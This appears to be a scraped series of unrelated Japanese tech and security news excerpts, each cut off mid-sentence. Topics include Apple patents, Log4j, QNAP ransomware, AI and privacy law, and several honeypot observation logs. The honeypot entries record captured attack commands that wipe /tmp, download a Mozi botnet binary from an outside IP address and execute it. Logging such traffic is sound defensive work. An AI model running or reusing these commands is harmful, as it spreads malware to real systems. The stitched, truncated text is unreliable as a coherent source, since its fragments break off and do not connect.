Appleが現地時間2022年2月1日、MacBookやApple Watchの筐体の一部をガラスにし、通知領域にする特許を米国特許商標庁（USPTO）において取得しました。 ガラスなどの素材を用いて一部を表示領域に Appleが今回取得した特許では、MacBookやApple Watchの筐体の一部を、ガラスやその他の金属以外の素材に置き換えて活用するアイデアが説明されています。 これらの素材を採用した部分には微細な穴が開けられ、透過した光による通知領域として活用されます。 下記図表10CにはMacBookが描かれており、ディスプレイ右上とパームレスト右側に通知領域が配置されています。 図表3A、3B、3Cは、通知領域の表示例です。 通知領域非表示時は、目立たない微細な穴の加工 微細な穴による通知領域を搭載するデバイス例として、MacBook以外にiPhoneやApple Pencil、

米シトリックス・システムズが、エリオット・インベストメント・マネジメントとビスタ・エクイティ・パートナーズにより165億ドル（1ドル110円換算で1兆8500億円）で買収されることを正式に発表しました。 シトリックス・システムズはデスクトップ仮想化の分野のパイオニアであり代表的なベンダとして知られています。 一時期はXenハイパーバイザやCloudStackなどのクラウド関連ソフトウェアなどにも積極的に取り組んできましたが、ビジネスとして継続的な成功を得るに至りませんでした。 ここ数年はAWSやVMware、マイクロソフトなどの競合ベンダと比べてクラウドとサブスクリプションビジネスへの移行が順調に進んでいるとはいえず、十分な業績を挙げているとは言えない状態でした。 買収後のシトリックスは非公開企業となり、買収した機関投資家の傘下にあるデータ解析などのソフトウェアを提供しているTIBCOと統

「Log4j」の脆弱性が公開されて1カ月以上が過ぎた。現在のところ、大規模な悪用被害は発表されていないが、対象範囲が非常に広く、深刻な影響を受ける可能性があるため、各所から注意喚起が発表されている。ここでは、検知状況や対策状況についてまとめる。 Log4jの脆弱性への対応の難しさ Log4jとは、Apacheが提供するデータログ生成・記録APIである。このLog4j（正しくはそのバージョン2系である「Log4j 2」）に、リモートコード実行という深刻な脆弱性が確認された。リモートコード実行とは、脆弱性のあるシステムに対して遠隔から任意のコードを実行できる、つまり乗っ取りが可能な脆弱性であり、非常に深刻度が高い。 ただし、このレベルの脆弱性は決して珍しいものではない。年に数回は発見されるレベルである。Log4jの脆弱性が話題になっているのは、汎用性が高くさまざまな環境に存在するためだ。Log

QNAP Systemsは1月26日(米国時間)、インターネットに公開されているNAS（ネットワーク接続ストレージ）デバイスを標的にした新しいタイプのランサムウェアに対する声明を発表した。 Take Immediate Actions to Stop Your NAS from Exposing to the Internet, and Update QTS to the latest available version. Fight Against Ransomware Together | QNAP 「DeadBolt」という名前のこのランサムウェアは、ターゲットとなったNASデバイスのデータを暗号化し、多くのランサムウェアと同様に復号キーと引き換えとしてビットコインによる身代金の支払いを要求する。QNAPでは、すべてのQNAP NASのユーザーに対して、NASデバイスがインターネット

ハニーポット(仮) 観測記録 2022/01/28分です。 特徴 共通 Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス D-link製品の脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス /.envへのスキャン行為 Apache Solrへのスキャン行為 Location:JP GPONルータの脆弱性を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス Apache Tomcatへのスキャン行為 Laravelへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 212.192.216.46

米ジョージア州クレイトン郡モローに住む男性が氷点下の屋外で転倒し、意識を失いましたが、Apple Watchの転倒検出機能により消防署への通知が行われ救命できた事例が報告されました。 冬の屋外で転倒し、意識不明の男性を救命 CBS46 News Atlantaによると、2022年1月23日に高齢の男性が自宅敷地外で転倒し、意識を失いました。 男性はApple Watchを装着していたため、転倒検出機能が働き、意識不明であること、倒れている場所がクレイトン群の緊急通信センターに送信されました。 救急隊は転倒検出機能が働いてから12分後に現場に到着、極度の低体温状態で意識が混濁している男性を救助しました。 男性は病院に搬送されて治療を受けた後、無事退院したとCBS46 News Atlantaは伝えています。 転倒検出機能の通知によるGPSデータから、転倒場所を速やかに確認 モロー市消防署のジ

1月24日週にかけて発生したセキュリティに関する出来事や、サイバー事件をダイジェストでお届け。 IPAから「情報セキュリティ 10大脅威 2022」 独立行政法人情報処理推進機構（以下、IPA）は1月27日、2021年に社会的影響が大きかった情報セキュリティの脅威、「情報セキュリティ 10大脅威 2022」を公開した。 「情報セキュリティ10大脅威 2022」は、2021年に発生した社会的に影響が大きかったと考えられる情報セキュリティ事案から10大脅威を選出したもの。IPAが脅威候補を選出し、情報セキュリティ分野の研究者や企業の実務担当者など約150名のメンバーで構成する「10大脅威選考会」が審議・投票を行い決定している。脅威は個人向けと組織向けに分かれている。 ■個人向け脅威 1位：フィッシングによる個人情報などの詐取 2位：ネット上の誹謗、中傷、デマ 3位：メールや SMSなどを使った

人工知能（AI）が日常生活で当たり前に利用される時代になった。目的を持って使っている場合もあれば、気がつかないうちに利用していることもあるだろう。人工知能（AI）を有効に活用するには人工知能（AI）に関するスキルや知見を高める必要がある。人工知能（AI）の発展は社会にどのような未来をもたらすのか、そして、人間の能力とAIの能力の逆転が起こると懸念されているシンギュラリティの問題と併せて解説する。 はじめに、人工知能（AI）が発展してきた歴史を振り返っておこう。人工知能（AI）の研究が始まったのは1940年代といわれているが、1950年初期には早くも機械翻訳の研究が開始された。1966年には英語で人間と対話を行うプログラムの開発に成功している。 1990年代にはWindowsの登場でパソコンやインターネットの普及が加速した。そんななかで1997年に人工知能（AI）がチェスで世界チャンピオンを

2022年のサイバーセキュリティ攻撃の傾向を知る 2022年版ソフォス脅威レポートでは、今後1年間にITセキュリティに影響を与えるサイバー脅威と攻撃者の主な傾向を明らかにし、組織が進化する攻撃から防御するために必要な洞察を提供します。 貴方が担当する組織の2022年セキュリティ戦略立案に役立つ情報をご提供します。 ランサムウェア・アズ・ア・サービス – このシフトの影響とは ランサムウェアのターゲットは、ますます大規模な組織に移行し、攻撃方法も変化しています。 最大の変化は、独自のランサムウェアを作成し、ターゲットを攻撃する「垂直指向型」の攻撃から、ランサムウェア作成者・販売業者・攻撃者とそれぞれの専門家が連携して攻撃を仕掛けてくる「Raas：Ransomware as a Service」とよばれるビジネスモデルへと変化したことです。これによりランサムウェア製造ノウハウのない悪意のある組

近年では人工知能(AI)の研究が急ピッチで進められており、OpenAIの「GPT-3」に代表される「自然な文章を生成するAI」が登場しています。「AIはすでに『言葉を理解している』のではないか」と思う人も多いかもしれませんが、アメリカのサンタフェ研究所で複雑系科学の教授を務め、「Artificial Intelligence: A Guide for Thinking Humans」などの著者でもあるメラニー・ミッチェル氏は、記事作成時点でのAIは真の意味で「言葉を理解している」とは考えにくいとの説を述べています。 What Does It Mean for AI to Understand? | Quanta Magazine https://www.quantamagazine.org/what-does-it-mean-for-ai-to-understand-20211216/ 「

まえがき 今月二回目のアドカレ記事になります。二本目のテーマは、グラフ理論のアルゴリズムの具体的な活用例です。 想定している対象読者は、ゲーム開発に興味がある人等です。あまり難しい話ではありませんので、気軽に読んでいただければと思います。 君はMinecraftを知っているか この世にはMinecraftというゲームがあります。まあ、多くの方は既にご存知かと思うのですが。 このゲームはいわゆるサンドボックスというカテゴリのもので、たくさんのブロックを最小単位として構成された世界で自由に遊ぶことができます。 立方体の形状でないブロックもある ブロックを積んでもよし、壊してもよし。あるいはPvPだけをひたすらに極めても良いし、クリエイティブモードで建築だけをしてもいい世界ですが、今回はゲームプレイに関する内容というよりMinecraftの中身の話をしようと思います。 今回のトピック さて、Mi

ハニーポット(仮) 観測記録 2021/12/14分です。 特徴 共通 Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス GPONルータの脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Apache Solrへのスキャン行為 Apache Tomcatへのスキャン行為 Laravelへのスキャン行為 Location：JP ThinkPHPの脆弱性を狙うアクセス phpMyAdminへのスキャン行為 WordPress Pluginへのスキャン行為 45[.]81[.]235[.]214に関する不正通信 を確認しました。 Location：US ThinkPHPの脆弱性

Log4j 脆弱性対策としてAWSブログで紹介されているAWS WAFのマネージドルールを利用した当ブログサイト(DevelopersIO)の保護設定と、副作用対策について紹介します。 AWSチームのすずきです。 AWSブログで紹介されている、Log4j 脆弱性対策として紹介されているマネージドルール「Log4JRCE」「AnonymouousIPList」「sizeRestrictions_BODY」を利用して、 当ブログサイト(DevelopersIO)の保護を行う機会がありました。 この過程で行ったマネージドルールの評価と、誤検知による副作用を回避する設定について紹介させて頂きます。 評価環境設定 先に紹介した「Log4JRCE」を含む AWSManagedRulesknownBadInputsRuleSet に加え、AWSManagedRulesCommonRuleSet、AWSM

Google検索では非常に高速な検索アルゴリズムが採用されており、無数に存在するウェブページの中から検索結果として適したウェブサイトを数ミリ秒で選び出すことができます。Googleは、そんな高速検索アルゴリズムに使われている技術「Vertex Matching Engine」を公開しており、Vertex Matching Engineのデモとして「数百万枚の画像やニュース記事から類似画像・記事を選び出す」というウェブアプリ「MatchIt Fast」が公開されていたので、実際に使ってみました。 MatchIt Fast https://matchit.magellanic-clouds.com/ MatchIt Fastにアクセスすると以下の画面が表示されるので、「Start」をクリックします。 次に、類似画像検索と類似ニュース検索の選択画面が表示されるので、今回は類似画像を試すべく「Im

本人（個人）から事業者への請求可能な事項が増えた 利用停止等の請求範囲が広がった（法第30条関係） 改正前：個人情報取扱事業者は、本人から請求があった際には、当該本人が識別される保有個人データが以下いずれかの場合は原則として、遅滞なく利用停止等または第三者提供の停止を行わなければなりませんでした。 目的外利用をしていた場合 不適正な利用をしていた場合 不正な取得をしていた場合 本人の同意なく要配慮情報を取得していた場合 本人の同意なく第三者に提供していた場合 改正後：改正前に加えて、以下のいずれかに該当する場合も、本人から請求があった際には、原則として遅滞なく利用停止等または第三者提供の停止を行わなければならなくなりました。 利用する必要がなくなった場合 漏えい等の事案が生じた場合 本人の権利または正当な利益が害されるおそれがある場合 利用停止等の請求範囲の拡大 [画像クリックで拡大] 解

悪意あるInternet Information Services（IIS）モジュールによって、Outlook on the webが、ログイン情報を盗むためのツールとして、またリモートアクセスパネルとして利用されることが判明しました。当社のリサーチャーが「OWOWA」と名付けたこのモジュールは、正体不明のアクターによって標的型攻撃に使用されています。 攻撃者がOutlook on the webに興味を示す理由 Outlook on the webは、MicrosoftのPersonal Information Manager（PIM）にアクセスするためのWebインターフェイスで、以前は「Exchange Web Connect」「Outlook Web Access」または「Outlook Web App（OWA）」の名称で呼ばれていました。Outlook on the webはIIS

標的型攻撃や二重脅迫型ランサムウェアなど、高度で巧妙化するサイバー攻撃に対応するため、サイバー攻撃の検出や分析を行う組織が増えています。しかし、セキュリティ対策や分析を行う上で一つの組織が、収集できる脅威情報の量や質、効率的で正確な分析を行うには限界があります。 そこで、サイバー・グリッド・ジャパン次世代セキュリティ技術研究所は、組織間をサイバー脅威分析でつなぐ「SecureGRIDアライアンス構想」を打ち出しました。SecureGRIDアライアンスが生まれた背景や仕組み、込められた思いなどについて、独立行政法人 情報処理推進機構IPAの小林 裕士さん、株式会社Geolocation Technology取締役の但野 正行さん、ラックの小笠原が語り合いました。 ※ この記事はジャーナルvol.12の記事の内容を一部抜粋したものです。詳細はジャーナルvol.12をご覧ください。 脅威情報に対

こんにちはCX事業本部IoT事業部のさかじです。 私のチームではソース管理はGitHubを使用しています。ハードウェア開発も同様です。ソフトの開発同様回路図などハードウェア開発も非同期でレビュー出来ないかと思いPull Requestのテンプレートを作成してレビューしてみました。 環境 Windows10 KiCad 5.1.10 GitHub 準備 Pull requestテンプレート作成 参考 : Pull Requestのテンプレートを作って効率よくレビューしよう！ ローカルリポジトリの .githubフォルダへ pull_request_template.md を作成しcommitしてリモートリポジトリへpushします。 テンプレート ## 機能概要 〇〇回路図作成 〇〇フットプリント作成 〇〇アートワーク作成 〇〇回路図サンプルコード作成 ## 変更点 - [x] 変更点A -

B Inc.は、こども向けプログラミング教育ツールソフトウェア「IchigoJam BASIC ver1.5」を2021年12月22日にリリースした。 「IchigoJam BASIC」は、LED点滅などプログラミングの初歩やゲーム作りなどを、1時間程度のワークショップで体験できる、プログラミング学習用に開発されたOSだ。 IchigoJam BASICは、福井県鯖江市全小中学校や高専のオープンキャンパスなど、さまざまな教育現場にて活用されている他、タミヤロボットスクールのプログラミングコースに導入されるなど、2021年12月時点で発行ライセンス数は7万3000を超えている。2020年9月28日にはver1.4.3がSkyBerryJAM用記念ファームウェアと共にリリースされた。 ver1.5では、RISC-Vチップ（GigaDevice GD32VF103CBT6）をCPUとして使用する

印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます 弁護士ドットコムは、同社が提供するウェブ完結型クラウド契約サービス「クラウドサイン」が、「政府情報システムのためのセキュリティ評価制度（ISMAP）」において、政府が求めるセキュリティ要求を満たしているサービスであると認定され、ISMAPクラウドサービスリストに登録されたと発表した。 クラウドサインは、「紙と印鑑」を「クラウド」に置き換え、契約作業をパソコンだけで完結できるWeb完結型クラウド契約サービス。すべてがクラウド上で完結するため、契約締結のスピード化とコスト削減を実現できる。電子契約機能は、「いつ、誰が、どの契約に合意したか」を証明する厳格な電子署名とタイムスタンプを付与し、リモートワークの環境下においても契約書の証拠力を担保

ASCII STARTUP STM32マイコンがREV Robotics社のバトル・ロボットに採用され、ロボット工学の活性化に貢献 STマイクロエレクトロニクス ロボット・バトルが科学・技術・工学・数学（STEM）への情熱を喚起 多種多様な電子機器に半導体を提供する世界的半導体メーカーのSTマイクロエレクトロニクス（NYSE：STM、以下ST）は、REV Robotics社のバトル・ロボット「Switchback」に、複数のSTM32マイクロコントローラ（マイコン）が採用されたことを発表しました。Switchbackは、重量が250ポンドで、自在に動くアーム上にデュアル・モータのドラム・スピナーを搭載しています。ロボット・バトル用に設計されているため、堅牢性と保守性に優れており、ドラム・スピナーで激しく打撃することで敵のロボットを破壊します。 Switchbackは、2022年1月6日にデ

米Googleは1月4日（現地時間）、Webブラウザ安定版のアップデートとなる「Chrome 97」（バージョン97.0.4692.71）をWindows、Mac、Linux向けに公開したと発表した。数日かけてローリングアウトしていく。 一般ユーザー向けの新機能としては、アクセスしたWebサイトに保存されたすべての情報を一括削除できるようになった。これまでは、個々のCookieを削除することしかできなかったが、Webサイトを訪問した際に保存されたすべてのデータと情報を削除できる。 ［設定］→［セキュリティとプライバシー］の「サイトの設定」→「すべてのサイトに保存されている権限とデータを表示」を開き、「データをすべて消去」をクリックすることで実行できる。

Googleスプレッドシートとは 前回までワードプロセッサーの「Googleドキュメント」について紹介しましたが、ワードプロセッサーと同様、オフィススイートに欠かせないのが表計算ではないでしょうか。もちろんGoogle Workspaceにも表計算ツールが用意されており、それが「Googleスプレッドシート」になります。 表計算ツールといえば「Microsoft Excel」がよく知られていますが、Googleスプレッドシートも基本的な機能や操作はMicrosoft Excelを踏襲しているようです。表にさまざまな項目や数値を入力して計算したり、グラフを作成したりするといった表計算の一般的な使い方はもちろんのこと、関数を使った高度な計算も可能なほか、大量のデータを処理するのに欠かせない「ピボットテーブル」なども利用することができます。 Google Workspaceの表計算アプリ「Goo

sponsored 新たな敵は地中から現れる！ さらなる刺客（シカク）が四角い地球を襲う！5月23日発売『デジボク地球防衛軍２（略）』の魅力をチェック sponsored 大阪・泉州産のスウェット生地を採用した「AKRacing by BEAMS DESIGN モデル」 スウェット生地のチェアってどう？ 編集部員何人かに座った感想を聞いてみた sponsored セブンアールジャパンの西川氏とASRockの原口氏にコダワリを聞いてきた パソコンショップSEVENとASRockのコダワリが炸裂！ Threadripper PRO 7995WX搭載BTOPC sponsored 従来よりもさらにコスパよくゲーミングPCを組みたい方へ ゲーミングマザーボード「GAMING PLUS」シリーズ完全解説＆自作のオススメ構成例も紹介 sponsored スタンダードなスリムPCだが高性能！ そんな注目

日立製作所は12月24日、従来のブラックボックス型AIを判断基準が明確なAIに変換するAI単純化技術を開発したことを発表した。製品検査の自動化、金融審査業務の効率化、インフラ制御の自動化などに活用していく。 従来のブラックボックス型AIは、予測精度を高めるために複雑な数式で構成されており判断基準が不明確であるため、未知のデータに対して意図しない予測結果を導く不安やリスクがあった。一方、今回発表した新技術を用いたAIは、あらゆる入力に対して人が理解できる単純な予測式を創出することにより、明確な判断基準の下で予測結果を提示するという。 AI単純化技術の概要 具体的には、まずAIへのさまざまな入力データに対し、要因(特徴量)が予測値に及ぼす影響の強さ(貢献度)を算出する。次に、特徴量が変化しても予測値への貢献度が一定である入力データの領域をクラスタリング技術により抽出。 抽出された入力データ領域

先日全世界を揺るがせたLog4jの脆弱性(通称Log4Shell)に対して、開発チームとしてどのように立ち回ったのか、その記録です。 2021/12/9に報告され、全世界を揺るがせたApache Log4jの脆弱性 CVE-2021-44228 ですが、我々prismatix事業部もその例外ではありませんでした。 脆弱性が判明した直後から、チームとして様々な対応を行っていましたが、一旦開発チームとしては状況が落ち着いています。このエントリでは、脆弱性に対してチームがどのように立ち回ったのか、記録を残しておきます。 最初の一報 12/10の朝、チームメンバーの藤村が、下記のtwitterにてlog4j2にRCEがあることを知り、Slackでチームに共有しました。 log4j2 って使ってましたっけ？RCE が見つかってやばいという話が出てる。 RCE in #Log4j2 #security

コード決済事業者やカード会社などで構成する業界団体・キャッシュレス推進協議会は12月24日、不正利用に関連する情報を事業者間で共有するための「不正利用関連情報確認データベース」（CLUE：Cross-referencing List of User’s Encrypted data）を構築すると発表した。 まずコード決済事業者間で運用。初期メンバーとして、NTTドコモ、KDDI、LINE Pay、楽天ペイメント、ファミマデジタルワン、コモニーが参画を検討しており、2022年度中の運用開始を目指す。 CLUEは、特定の決済事業者で不正利用が発覚した場合、その情報を登録すれば、他の事業者に、同様の情報を含むアカウントがあるか確認できるシステム。 共有する情報はハッシュ化され、登録した事業者以外は確認できず、照合したい情報の有無だけが確認できる仕様だ。情報の種類や内容は「セキュリティの観点から公

(英文はこちらから) はじめに： 日常の生活では使い捨て商品をよく使用されます。例えば割り箸、コンタクトレンズ、マスクなど。使い捨て商品の利点は、目的が満たされたらそれらを維持する必要がないことです。近年で発展してきたこのデジタル社会では使い捨てのメールアドレスも人気が集まってます。捨てアドと略語され個人情報をある程度保護しながら、不要な迷惑メールの受信を避けることに訳立ちます。一時的な登録の目的で、何も条件を付けずサービスを使用できるようにするために使い捨てのメールが最適です。 はじめに： いくつかの使い捨てのメールアドレスを評価した後、現在提供しているサービスに基づいていくつかのウェブサイトをここで推奨します。 １）InstAddr こちらのサイトでは、多国語のユーザー向けのプラットフォームを提供しランダムなメールアドレスを発行されます。一時的なメールアドレスですが、有効期限付きまたは

leadGMOインターネットグループのGMOグローバルサイン・ホールディングは、同社が開発・運営する電子契約サービス「電子印鑑GMOサイン」において、行政専用の閉域網・総合行政ネットワーク（LGWAN）への対応を12月24日より開始したと発表した。 GMOインターネットグループのGMOグローバルサイン・ホールディングは12月24日、同社が開発・運営する電子契約サービス「電子印鑑GMOサイン」において、行政専用の閉域網・総合行政ネットワーク（LGWAN）への対応を開始したと発表した。 「電子印鑑GMOサイン」LGWAN対応版の特徴 同社はインターネット経由で提供している「電子印鑑GMOサイン」とほぼ同等の機能を、LGWAN環境で提供する。「電子印鑑GMOサイン」はLGWANを運営する地方公共団体情報システム機構（J-LIS）の審査・認証を受けたLGWAN-ASPとして提供され、総務省や各地方

Ho Ho Ho こんばんは、ソラコムでサンタ エンジニアをやってます松井(ニックネーム: moto)です。 ソラコムサンタ2021でお届けした、バイナリーパーサーの MessagePack 形式対応について、ちょっと深堀りしてお伝えしたいと思います。 今年の３月ごろに、ソーシャル上でこんなリクエストをいただいていました。 ここであらためてバイナリーパーサーと MessagePack 形式についておさらいをしてみましょう。 バイナリーパーサーとMessagePack まずバイナリパーサーですが、IoT デバイスから送信されたバイナリデータをお客様が定義したフォーマットに従って SORACOM プラットフォーム上で JSON 形式にデコードし SORACOM Beam / Funnel / Funk / Harvest に送信できる機能です。 そしてMessagePackですが、公式サイトに

ファーストリテイリング（以下、FR）と（以下、ASX）およびNIPは、係争中であったRFIDを活用したセルフレジ案件において、相互に協力関係を築くべく全面的な和解をしたことを発表した。 同和解で、FRは、現在NIPの保有する特許が有効に存在していることを尊重し、ASXおよびNIPは、同セルフレジはASXの特許出願が公開される以前から、FRが独自に開発し使用していたものであると確認するという円満な和解合意とのことだ。 和解成立の結果として、ASXおよびNIPは特許権侵害訴訟等を取り下げ、FRは無効審判請求を取り下げるとしている。 同件係争の当初、セルフレジの開口型RFID読み取り機能に関する特許を取得していたASX（現在はNIPに譲渡）と、この特許公開前から独自にセルフレジを開発し使用していたFRとの間で同件特許の有効性について見解の相違があり、話し合いによっても溝が埋まらなかったという。

ハニーポット(仮) 観測記録 2021/12/15分です。 特徴 共通 PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス /.envへのスキャン行為 Location:JP ThinkPHPの脆弱性を狙うアクセス Security Services Providerによるスキャン行為 /.gitへのスキャン行為 Apache Solrへのスキャン行為 phpMyAdminへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget http://61.137.146.74:45768/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws cd /tmp; rm -rf *; wg

ハニーポット(仮) 観測記録 2021/12/16分です。 特徴 共通 Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス ThinkPHPの脆弱性を狙うアクセス /.envへのスキャン行為 Apache Solrへのスキャン行為 Laravelへのスキャン行為 Location:JP PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス Spring Bootの脆弱性を狙うアクセス curlによるスキャン行為 zgrabによるスキャン行為 /.gitへのスキャン行為 WordPress Pluginへのスキャン行為 を確認しました。 Location:US Apache Log4j2の脆弱性(CVE-2021-44228

オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら

オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら

オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら

セキュリティ企業のPositive Securityは2021年12月22日（現地時間）、「Microsoft Teams」（Teams）に4つの脆弱（ぜいじゃく）性を発見したと伝えた。 これらの脆弱性は2021年3月にはすでにMicrosoftに報告されていたが、同社はこのうち1つだけを修正対象と認定し、残り3つの脆弱性については修正していない。悪用の可能性は低いが、Teamsを使用している場合には注意が必要だ。

Cookieで画面が見えない!? 海外企業のWebサイトを初めて閲覧すると、Webブラウザの画面を覆うように「Cookie取得に関するポップアップ」が表示されるようになって久しい。 ポップアップ表示がこの上なく邪魔、さらに注意書きを読んでも『なぜ・どのような同意を求められているのか？』が今ひとつわからない。かといって、ボタンをクリックしないと必要な情報が得られない。まったくもどかしい限りだ。 では、なぜCookie取得について同意することを確認されるのか？　そしてCookieはどんな用途に使われているのだろうか？ そもそもCookieとは……？ Cookieとは、Webサイト閲覧の利便性・快適性を高めるためのデータである。サイズはごく小さく、通信速度を意識するようなものでもない。Webサイトにアクセスしたとき、サーバーからブラウザへと送信される。 ユーザーが再び同じサイトを訪れたとき、ブラ

Top > ラーニング > 「AIを実装できない“肩透かし”にはなりたくなかった」AI未経験のエンジニアが挫折せずに半年でE資格を取得するまで